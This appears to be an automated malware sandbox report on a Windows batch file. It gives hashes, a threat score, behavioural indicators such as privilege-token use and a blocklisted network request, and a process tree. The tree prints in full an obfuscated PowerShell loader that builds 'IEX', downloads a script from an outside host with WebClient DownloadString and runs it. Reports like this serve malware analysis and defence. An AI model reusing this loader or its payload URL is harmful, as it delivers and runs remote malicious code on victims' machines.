5c17ee4b38904d825ab3514f17c60f5806295367fb979d2ba23826a87c34dde1

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
22/02/2024, 11:50

Target

doc20242202025736.bat
Size

913B
MD5

08568aa884540f8ba2361bf164964b60
SHA1

88c6b7c3d49993ca167437957939d1a933456054
SHA256

b2aa337b234dfa6d5e90b8b775c5df4f6d6a21e9968beae063de043991d7768c
SHA512

d260c49085af7ccd126de7a99b907ede6004d17f99495d1884ce161441fe1df5d5e5047b47695b7a8d644219f99acb3d384b6874d44371a898023e4ae8465f27

Score

8^/10

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	348	powershell.exe
5	348	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
348	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	348	powershell.exe
Token: SeIncreaseQuotaPrivilege	348	powershell.exe
Token: SeSecurityPrivilege	348	powershell.exe
Token: SeTakeOwnershipPrivilege	348	powershell.exe
Token: SeLoadDriverPrivilege	348	powershell.exe
Token: SeSystemProfilePrivilege	348	powershell.exe
Token: SeSystemtimePrivilege	348	powershell.exe
Token: SeProfSingleProcessPrivilege	348	powershell.exe
Token: SeIncBasePriorityPrivilege	348	powershell.exe
Token: SeCreatePagefilePrivilege	348	powershell.exe
Token: SeBackupPrivilege	348	powershell.exe
Token: SeRestorePrivilege	348	powershell.exe
Token: SeShutdownPrivilege	348	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeSystemEnvironmentPrivilege	348	powershell.exe
Token: SeRemoteShutdownPrivilege	348	powershell.exe
Token: SeUndockPrivilege	348	powershell.exe
Token: SeManageVolumePrivilege	348	powershell.exe
Token: 33	348	powershell.exe
Token: 34	348	powershell.exe
Token: 35	348	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 348	2372	cmd.exe	23
PID 2372 wrote to memory of 348	2372	cmd.exe	23
PID 2372 wrote to memory of 348	2372	cmd.exe	23

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\doc20242202025736.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='https','://jeepcommerce.com/M9.txt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:348

memory/348-4-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/348-5-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/348-6-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/348-7-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/348-8-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/348-9-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/348-10-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/348-11-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/348-12-0x0000000002B40000-0x0000000002BC0000-memory.dmp

Filesize
512KB

Download
memory/348-13-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download